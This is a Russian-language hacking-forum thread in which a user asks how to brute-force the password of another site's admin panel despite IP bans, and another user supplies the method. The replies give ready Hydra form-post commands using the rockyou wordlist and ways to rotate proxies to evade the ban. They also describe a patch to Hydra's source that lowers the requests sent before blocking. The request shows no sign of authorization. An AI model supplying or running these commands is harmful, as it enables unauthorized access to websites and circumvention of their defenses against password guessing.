PDA

Просмотр полной версии : Как провести брут атаку на админку

Sensoft
24.08.2016, 04:45
Как провести брут атаку на админку есть сайт с админкой site.ru/admin

Логин там сразу показывают нужен только пароль, но загвоздка сайт быстро банит ip на час

Кто знает как поставить запрос в гидре ?
Absurd
24.08.2016, 08:09
Sensoft said:
↑ (https://antichat.live/posts/3984337/)
Как провести брут атаку на админку есть сайт с админкой site.ru/admin
Логин там сразу показывают нужен только пароль, но загвоздка сайт быстро банит ip на час
Кто знает как поставить запрос в гидре ?


Вот к примеру описание https://blog.kplus.pro/hack/hydra-bruteforce-passwd.html

В гугле забанили?
Sensoft
24.08.2016, 08:24
Absurd said:
↑ (https://antichat.live/posts/3984346/)
Вот к примеру описание
https://blog.kplus.pro/hack/hydra-bruteforce-passwd.html
В гугле забанили?


Ещё вопрос логин там прописан и стереть его нельзя его надо выстовлять при настройках гидры ?
Sensoft
24.08.2016, 08:39
Короче ссылка выглядит так http://site.com/admin

В форме прописанный пароль домен сайта его стереть нельзя

Примерно после 100 запросов банится сайт нужно хотя бы 500 прокси

Пароли для брута есть путь знаю

Кто может в лс правильный запрос написать ? буду вечно благодарен
korneev
24.08.2016, 12:57
hydra -F -l admin -P rockyou.txt site.com https-form-post "/admin/index.php:username=^USER^&password=^PASS^&parameter1=value1:S=Login Success"

или так

hydra -F -l admin -P rockyou.txt site.com https-form-post "/admin/index.php:username=^USER^&password=^PASS^&parameter1=value1:F=Login Fail"

чтобы заставить гидру использовать списки прокси придется использовать какой нибудь промежуточный прокси-сервер, куда ты сможешь эти списка загрузить, а гидру заставитть использовать этот промежуточный прокси.

В качестве такого может быть mitmproxy (kali) A4proxy (win).

Еще вариант - используй сервис смены ip у которого одна входная точка. например proxymesh - он тебе дает одну входную точку для гидры (например open.proxynmesh.com) и чередует выходные ip. Но он платный.

Чтобы заставить гидру идти через прокси - надо сделать так:

#export HYDRA_PROXY=http://127.0.0.1:8080

Еще момент. перед отправкой POST гидра всегда отправляет GET. Это может уменьшить количество переборов до блокировки. Учти это. Чтобы это исправить - нужно заменить getcookie = 1; -> getcookie = 0; в файле hydra-http-form.c и пересобрать зверя.